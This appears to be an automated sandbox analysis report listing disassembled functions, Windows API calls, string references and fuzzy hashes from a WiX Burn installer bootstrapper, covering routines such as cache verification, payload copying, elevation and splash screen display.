String ID: $$0$Could not close verify handle.$Could not verify file %ls.$Failed to allocate memory$Failed to allocate string.$Failed to encode file hash.$Failed to get file hash.$cache.cpp
API String ID: 1452528299-4263581490
Opcode ID: 3542c660610c0403cface61c2ea014276f67eb5ef9f3d5a528c3f8933534a67b
Instruction ID: a1544b85d71b8586fa7e19b5dfacfb6c17f18f4a7e7665bf31002600a29d1234
Opcode Fuzzy Hash: 3542c660610c0403cface61c2ea014276f67eb5ef9f3d5a528c3f8933534a67b
Instruction Fuzzy Hash: 84714072E00229ABDB11DBE9C841BEEB7F8AF09710F110126E915FB291E7749D418BA1

Function 000AE31B Relevance: 16.6, APIs: 11, Instructions: 86windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 000AE326
DefWindowProcW.USER32(?,00000082,?,?), ref: 000AE364
SetWindowLongW.USER32(?,000000EB,00000000), ref: 000AE371
SetWindowLongW.USER32(?,000000EB,?), ref: 000AE380
DefWindowProcW.USER32(?,?,?,?), ref: 000AE38E
CreateCompatibleDC.GDI32(?), ref: 000AE39A
SelectObject.GDI32(00000000,00000000), ref: 000AE3AB
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 000AE3CD
SelectObject.GDI32(00000000,00000000), ref: 000AE3D5
DeleteDC.GDI32(00000000), ref: 000AE3D8
PostQuitMessage.USER32(00000000), ref: 000AE3E6

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Window$Long$ObjectProcSelect$CompatibleCreateDeleteMessagePostQuitStretch
String ID:
API String ID: 409979828-0
Opcode ID: 98857430f797d0ba814e44ca54a8bb95633afc55311b619b90e32d5ee5e6b84f
Instruction ID: a8ca6fe86f082254e75f8c09089a2b64eb6e63de903fc063ac5efcf129d44d08
Opcode Fuzzy Hash: 98857430f797d0ba814e44ca54a8bb95633afc55311b619b90e32d5ee5e6b84f
Instruction Fuzzy Hash: 0A218C33100108FFEF255FA9DC4CE7B3FA9EF4A321B164519FA16971A0D7758A10AB61

Function 000A9F36 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 220COMMON

Download Yara Rule

Strings

WixBundleLastUsedSource, xrefs: 000A9F9D
WixBundleOriginalSource, xrefs: 000A9FB3
Failed to get current process directory., xrefs: 000A9FEF
Failed to combine last source with source., xrefs: 000AA00C
Failed to copy source path., xrefs: 000AA113
Failed to combine layout source with source., xrefs: 000AA0A0
WixBundleLayoutDirectory, xrefs: 000AA068
Failed to get bundle layout directory property., xrefs: 000AA083

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Find$CloseFileFirstlstrlen
String ID: Failed to combine last source with source.$Failed to combine layout source with source.$Failed to copy source path.$Failed to get bundle layout directory property.$Failed to get current process directory.$WixBundleLastUsedSource$WixBundleLayoutDirectory$WixBundleOriginalSource
API String ID: 2767606509-3003062821
Opcode ID: 903552142774c5e8ce37a691be07de89fa209b2109351ab08fd4d4ece2b13a77
Instruction ID: 79618cac4728d019a3454ff1e7cfd0e3775e035c0f48deff1d30530077381575
Opcode Fuzzy Hash: 903552142774c5e8ce37a691be07de89fa209b2109351ab08fd4d4ece2b13a77
Instruction Fuzzy Hash: 97715C71E00219AEDF229FE4DC41AFEBBB9AF0A310F11012AF911B7291D7759D40DB62

Function 00093083 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000,00000040,00000000,00000000), ref: 000930C7
GetLastError.KERNEL32 ref: 000930D1
ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00093129
GetLastError.KERNEL32 ref: 00093133
GetFullPathNameW.KERNEL32(00000000,00000040,00000000,00000000,00000000,00000040,00000000,00000000), ref: 000931EC
GetLastError.KERNEL32 ref: 000931F6
GetFullPathNameW.KERNEL32(00000000,00000007,00000000,00000000,00000000,00000007), ref: 0009324D
GetLastError.KERNEL32 ref: 00093257

Strings

pathutil.cpp, xrefs: 000930F5

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLast$EnvironmentExpandFullNamePathStrings
String ID: pathutil.cpp
API String ID: 1547313835-741606033
Opcode ID: f95a640af04f23a487c675c2d6cdf1d115ca144537c4d561678c94114cf1b82b
Instruction ID: bf5c912a37944cdf28db083dbbba14e2d78823fb8eab51ea8c3e7b9e2ec167fd
Opcode Fuzzy Hash: f95a640af04f23a487c675c2d6cdf1d115ca144537c4d561678c94114cf1b82b
Instruction Fuzzy Hash: 77618332E00225ABEF219BA58C49BEE7BE8EF44750F124166FD15E7150E735CE00ABA0

Function 00092DE0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 198sleepfiletimeCOMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001,00000000,00000000), ref: 00092E7A
GetLastError.KERNEL32 ref: 00092E84
GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00092F1F
CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00092FAD
GetLastError.KERNEL32 ref: 00092FBA
Sleep.KERNEL32(00000064), ref: 00092FCC
CloseHandle.KERNEL32(?), ref: 0009302C

Strings

%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 00092F7D
pathutil.cpp, xrefs: 00092EA8

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
String ID: %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
API String ID: 3480017824-1101990113
Opcode ID: 06166b9935802b71d6c70f963b40751d03111141aeb80e771067ffbd2afba164
Instruction ID: a455d28b21fee41bdcdcec63537d2490950a25a56ab3497c6e07263923174075
Opcode Fuzzy Hash: 06166b9935802b71d6c70f963b40751d03111141aeb80e771067ffbd2afba164
Instruction Fuzzy Hash: 08716072941229BBDF709BA4DC49BEAB7F8AB48710F0101A6FD19E7191D7349E809F60

Function 00094690 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 128windowthreadCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 000946B5
GetCurrentThreadId.KERNEL32 ref: 000946BB

Part of subcall function 000AFC51: new.LIBCMT ref: 000AFC58

GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00094749

Strings

Failed to load UX., xrefs: 000946FE
Failed to start bootstrapper application., xrefs: 00094717
wininet.dll, xrefs: 000946E8
engine.cpp, xrefs: 00094795
Unexpected return value from message pump., xrefs: 0009479F
Failed to create engine for UX., xrefs: 000946D5

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Message$CurrentPeekThread
String ID: Failed to create engine for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$engine.cpp$wininet.dll
API String ID: 673430819-2573580774
Opcode ID: 338d43272ac0d41782f49cc7fe09d35def8257394412f580b5db104e9c3d8645
Instruction ID: 42f52a372b09836c95dad6b144a83fbaab7aece8784be494f83e8b7c8412728c
Opcode Fuzzy Hash: 338d43272ac0d41782f49cc7fe09d35def8257394412f580b5db104e9c3d8645
Instruction Fuzzy Hash: 6541BF71604219BFEF149BE4CC85EBEB7ACEF05314F110126F905EB281EB20AD02A7A1

Function 000A8CB5 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 127COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000,?,00000001,80000005,?,00000000,00000000,00000000,00000003,000007D0), ref: 000A8E01

Strings

Failed to create ACL to secure cache path: %ls, xrefs: 000A8DB7
Failed to allocate access for Users group to path: %ls, xrefs: 000A8D6B
Failed to secure cache path: %ls, xrefs: 000A8DE4
Failed to allocate access for Administrators group to path: %ls, xrefs: 000A8D08
Failed to allocate access for SYSTEM group to path: %ls, xrefs: 000A8D29
Failed to allocate access for Everyone group to path: %ls, xrefs: 000A8D4A
cache.cpp, xrefs: 000A8DAC

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: FreeLocal
String ID: Failed to allocate access for Administrators group to path: %ls$Failed to allocate access for Everyone group to path: %ls$Failed to allocate access for SYSTEM group to path: %ls$Failed to allocate access for Users group to path: %ls$Failed to create ACL to secure cache path: %ls$Failed to secure cache path: %ls$cache.cpp
API String ID: 2826327444-4113288589
Opcode ID: 1d3105a50b2a1750f4c178e7520f83542db9fd6724b44d9ee77d330c293e4025
Instruction ID: b8c5d0ff4be45a446d18664e3c8d4996a6c125b9f891e2172ea58a7b1eab24eb
Opcode Fuzzy Hash: 1d3105a50b2a1750f4c178e7520f83542db9fd6724b44d9ee77d330c293e4025
Instruction Fuzzy Hash: 6E410872A41269BAEB3196A58C45FEB7BA8EF11B10F018065FE08BB1C1DF619D44C7A1

Function 000B9A57 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 125COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,000BADE5,?,00000001,00000000), ref: 000B9AE1
GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,000BADE5,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 000B9AEB
CopyFileExW.KERNEL32(00000000,00000000,000B993C,00000000,00000020,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 000B9B39
GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,000BADE5,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 000B9B68

Strings

Failed attempt to copy payload from: '%ls' to: %ls., xrefs: 000B9B9A
BA aborted copy of payload from: '%ls' to: %ls., xrefs: 000B9B61
apply.cpp, xrefs: 000B9B0F, 000B9B53, 000B9B8C
copy, xrefs: 000B9AAF
Failed to clear readonly bit on payload destination path: %ls, xrefs: 000B9B1A

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorFileLast$AttributesCopy
String ID: BA aborted copy of payload from: '%ls' to: %ls.$Failed attempt to copy payload from: '%ls' to: %ls.$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$copy
API String ID: 1969131206-836986073
Opcode ID: 75c3aca3b146df13f47fb970c06253865d0c7a1859425a0c7fc8893e9e747ecd
Instruction ID: 3f56ce70b6782c7add4603b7dc90bcc82c475830a349c3338010016cd47f1f41
Opcode Fuzzy Hash: 75c3aca3b146df13f47fb970c06253865d0c7a1859425a0c7fc8893e9e747ecd
Instruction Fuzzy Hash: 8031D571741315BFEB209A66DC81EFBB7DDEF40750B11812ABE09EB292D720CD0096E1

Function 000D6ACD Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 116COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,74DEDFD0,000000FF,name,000000FF,74DEDFD0,?,74DEDFD0,?,74DEDFD0), ref: 000D6B2B
CompareStringW.KERNEL32(0000007F,00000000,000000FF,000000FF,email,000000FF), ref: 000D6B48
SysFreeString.OLEAUT32(00000000), ref: 000D6B86
SysFreeString.OLEAUT32(00000000), ref: 000D6BCD

Strings

email, xrefs: 000D6B3A
name, xrefs: 000D6B1D
9q, xrefs: 000D6AD5, 000D6AE5
uri, xrefs: 000D6B56

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: String$CompareFree
String ID: 9q$email$name$uri
API String ID: 3589242889-2415954632
Opcode ID: 9ed518eb3923ef08b83cad377552d72ef4c9fbaa9f669889e4d451c38aee899c
Instruction ID: e84254c9655cf821e07f5fa7902cfad8065de86c6a47e4d7f6f9e9be75e03242
Opcode Fuzzy Hash: 9ed518eb3923ef08b83cad377552d72ef4c9fbaa9f669889e4d451c38aee899c
Instruction Fuzzy Hash: D5416F35A05318BBCB61DBA4CC45FAE77B4AF04720F2142A6E911EB290C7329E44DB60

Function 000AE05E Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(?,00000001), ref: 000AE094
GetLastError.KERNEL32 ref: 000AE0A0
GetObjectW.GDI32(00000000,00000018,?), ref: 000AE0E7
GetCursorPos.USER32(?), ref: 000AE108
MonitorFromPoint.USER32(?,?,00000002), ref: 000AE11A
GetMonitorInfoW.USER32(00000000,?), ref: 000AE130

Strings

Failed to load splash screen bitmap., xrefs: 000AE0CE
(, xrefs: 000AE127
splashscreen.cpp, xrefs: 000AE0C4

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Monitor$BitmapCursorErrorFromInfoLastLoadObjectPoint
String ID: ($Failed to load splash screen bitmap.$splashscreen.cpp
API String ID: 2342928100-598475503
Opcode ID: 758ea92b6c1077c149bebac3c0abb8292170b6aacec94c2799f3bef1c89151a2
Instruction ID: 4276c4bf3705ecfb0231c7b364a7a40dfb36aed48216089fd4e43143f02cc1e2
Opcode Fuzzy Hash: 758ea92b6c1077c149bebac3c0abb8292170b6aacec94c2799f3bef1c89151a2
Instruction Fuzzy Hash: 2A313F71A01215EFDB50DFB9D945A9EBBF5EB08710F14811AFD14EB241EB74D901CB60

Function 0009C7DF Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 97fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0009CC57: CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,0009E336,000000FF,00000000,00000000,0009E336,?,?,0009DADD,?,?,?,?), ref: 0009CC82

CreateFileW.KERNEL32(E9000DBA,80000000,00000005,00000000,00000003,08000000,00000000,000952BD,000DB450,00000000,000953B5,04680A79,?,000952B5,00000000,00095381), ref: 0009C84F
GetLastError.KERNEL32(?,?,?,000A75F7,00095565,00095371,00095371,00000000,?,00095381,FFF9E89D,00095381,000953B5,0009533D,?,0009533D), ref: 0009C894

Strings

catalog.cpp, xrefs: 0009C8B5
Failed to open catalog in working path: %ls, xrefs: 0009C8C2
Failed to find payload for catalog file., xrefs: 0009C8D9
=S, xrefs: 0009C86F
Failed to verify catalog signature: %ls, xrefs: 0009C88D
Failed to get catalog local file path, xrefs: 0009C8D2
=S, xrefs: 0009C7E5, 0009C872

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CompareCreateErrorFileLastString
String ID: =S$=S$Failed to find payload for catalog file.$Failed to get catalog local file path$Failed to open catalog in working path: %ls$Failed to verify catalog signature: %ls$catalog.cpp
API String ID: 1774366664-2107469521
Opcode ID: 2005d88bfc826562e7344929b3bb5582b47cc6341a55887a6b7dc23a7d958bcb
Instruction ID: c0399d016cb03f8559fa65c3d3300d5f12a69f33cac0c46b8ce92582f70b95a9
Opcode Fuzzy Hash: 2005d88bfc826562e7344929b3bb5582b47cc6341a55887a6b7dc23a7d958bcb
Instruction Fuzzy Hash: 7331E771D40715BFEB109F64CC41FAABBA4EF04710F11812AF909EB290DB71AD50ABA0

Function 000964B6 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 93COMMON

Download Yara Rule

APIs

GetSystemWow64DirectoryW.KERNEL32(?,00000104), ref: 000964F7
GetLastError.KERNEL32 ref: 00096505
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00096546
GetLastError.KERNEL32 ref: 00096550

Strings

variable.cpp, xrefs: 00096535, 00096574
Failed to get 32-bit system folder., xrefs: 0009653F
Failed to get 64-bit system folder., xrefs: 0009657E
Failed to backslash terminate system folder., xrefs: 000965A2
Failed to set system folder variant value., xrefs: 000965BE

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: DirectoryErrorLastSystem$Wow64
String ID: Failed to backslash terminate system folder.$Failed to get 32-bit system folder.$Failed to get 64-bit system folder.$Failed to set system folder variant value.$variable.cpp
API String ID: 2634638900-1590374846
Opcode ID: f25fe423b61a88df34a33872c81bbb9c5802d8d7f7b32b73fe4c984ad7a72dd4
Instruction ID: cb1639dfe824e24b64c376d42a89fad552a8e7dd1bdd9640d2cc792b5f5c1b2d
Opcode Fuzzy Hash: f25fe423b61a88df34a33872c81bbb9c5802d8d7f7b32b73fe4c984ad7a72dd4
Instruction Fuzzy Hash: 9421FBB1A41735A6EF2067B59C06BAB77E89F00750F124167FD08EB281EA65CE04D5F1

Function 000A4ED2 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 84COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,?,?,000DB4F0), ref: 000A4EDB
GetProcessId.KERNEL32(000000FF,?,?,open,00000000,00000000,?,000000FF,?,?), ref: 000A4F79
CloseHandle.KERNEL32(00000000), ref: 000A4F92

Strings

Failed to allocate parameters for elevated process., xrefs: 000A4F14
-q -%ls %ls %ls %u, xrefs: 000A4F00
open, xrefs: 000A4F43, 000A4F51
runas, xrefs: 000A4F39
Failed to launch elevated child process: %ls, xrefs: 000A4F66
burn.elevated, xrefs: 000A4EFB

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Process$CloseCurrentHandle
String ID: -q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$burn.elevated$open$runas
API String ID: 2815245435-1352204306
Opcode ID: 4ee87ef7ec2c4faafbdfd8448759944cf1fbb868df108505309112e150885dab
Instruction ID: a5f4e5a88df5cd390cd48a364daadfea22f738959a3b2676d0e243d590ca4f18
Opcode Fuzzy Hash: 4ee87ef7ec2c4faafbdfd8448759944cf1fbb868df108505309112e150885dab
Instruction Fuzzy Hash: EE216B79D01209FFDF119FD5CC818EEBBB8EF09351B10817AF904A6241D7B59E109B90

Function 0009671C Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 74libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(msi,DllGetVersion), ref: 00096746
GetProcAddress.KERNEL32(00000000), ref: 0009674D
GetLastError.KERNEL32 ref: 00096757

Strings

msi, xrefs: 0009673D
Failed to get msi.dll version info., xrefs: 0009679F
variable.cpp, xrefs: 0009677B
Failed to find DllGetVersion entry point in msi.dll., xrefs: 00096785
Failed to set variant value., xrefs: 000967C3
DllGetVersion, xrefs: 00096738

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: DllGetVersion$Failed to find DllGetVersion entry point in msi.dll.$Failed to get msi.dll version info.$Failed to set variant value.$msi$variable.cpp
API String ID: 4275029093-842451892
Opcode ID: 66bae320b114f5252be5564bd483f48f263765814e4862e2af75afa9c7923f41
Instruction ID: 997093f4b1be925dc9f1a2b922a5deb452849b66322ef089723ccbeca16320b9
Opcode Fuzzy Hash: 66bae320b114f5252be5564bd483f48f263765814e4862e2af75afa9c7923f41
Instruction Fuzzy Hash: 1511D671B04725AAEB20ABB9DC46ABFB7D8DB04710F01051BFE05FB281EA659C0492F1

Function 00091174 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 53libraryloadermemoryCOMMON

Download Yara Rule

APIs

HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,0009111A,cabinet.dll,00000009,?,?,00000000), ref: 00091185
GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,0009111A,cabinet.dll,00000009,?,?,00000000), ref: 00091190
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0009119E
GetLastError.KERNEL32(?,?,?,?,0009111A,cabinet.dll,00000009,?,?,00000000), ref: 000911B9
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 000911C1
GetLastError.KERNEL32(?,?,?,?,0009111A,cabinet.dll,00000009,?,?,00000000), ref: 000911D6

Strings

SetDefaultDllDirectories, xrefs: 00091198
SetDllDirectoryW, xrefs: 000911BB
kernel32, xrefs: 0009118B

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: AddressErrorLastProc$HandleHeapInformationModule
String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
API String ID: 3104334766-1824683568
Opcode ID: 08480cf923c708250aa0dd77f042eb11bccc3c13847d7cc0c71801747df84235
Instruction ID: f7c5dc04753922a55fde4cc81863150e8db7adfa58206fbaa5731ea9c2abbce2
Opcode Fuzzy Hash: 08480cf923c708250aa0dd77f042eb11bccc3c13847d7cc0c71801747df84235
Instruction Fuzzy Hash: E5017171741616FB9B206BA6AC09EAF7FACFF40791B018013FE1596240DB74DA019BB1

Function 000AF3E6 Relevance: 15.2, APIs: 2, Strings: 8, Instructions: 155COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 000AF3FB
LeaveCriticalSection.KERNEL32(?), ref: 000AF576

Strings

Failed to set download user., xrefs: 000AF4FE
Failed to set download password., xrefs: 000AF524
Engine is active, cannot change engine state., xrefs: 000AF415
UX requested unknown container with id: %ls, xrefs: 000AF4A0
UX denied while trying to set download URL on embedded payload: %ls, xrefs: 000AF466
UX requested unknown payload with id: %ls, xrefs: 000AF450
UX did not provide container or payload id., xrefs: 000AF565
Failed to set download URL., xrefs: 000AF4D5

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

